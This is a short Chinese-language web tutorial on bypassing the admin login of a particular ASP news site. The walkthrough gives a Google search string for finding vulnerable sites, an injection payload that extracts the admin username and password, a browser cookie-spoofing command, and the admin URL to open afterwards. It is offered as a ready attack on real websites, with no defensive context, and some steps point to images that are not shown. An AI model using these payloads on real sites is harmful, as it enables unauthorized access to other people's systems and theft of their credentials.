COOKIES欺騙通殺漏洞進后臺

發布時間：2020-07-31 16:38:59 來源：網絡閱讀：1510 作者：許肖欄目：安全技術

在谷歌里搜索：inurl:news_more.asp?lm2=

搜索到如下站點：http://www.*********/news_more.asp?lm2=169

1.將“/news_more.asp?lm2=169”替換成“/admin/admin_news_pl_view.asp?id=1”

2.將 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘貼到如下框內，修改保存。

COOKIES欺騙通殺漏洞進后臺

將 alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代碼拷貝進瀏覽器，回車；（注：標紅1處填上圖中1內容，2處填上圖中2內容）

COOKIES欺騙通殺漏洞進后臺點擊確定。

5.將地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回車，即可不用登錄直接進入后臺了。如圖，

COOKIES欺騙通殺漏洞進后臺

向AI問一下細節

猜你喜歡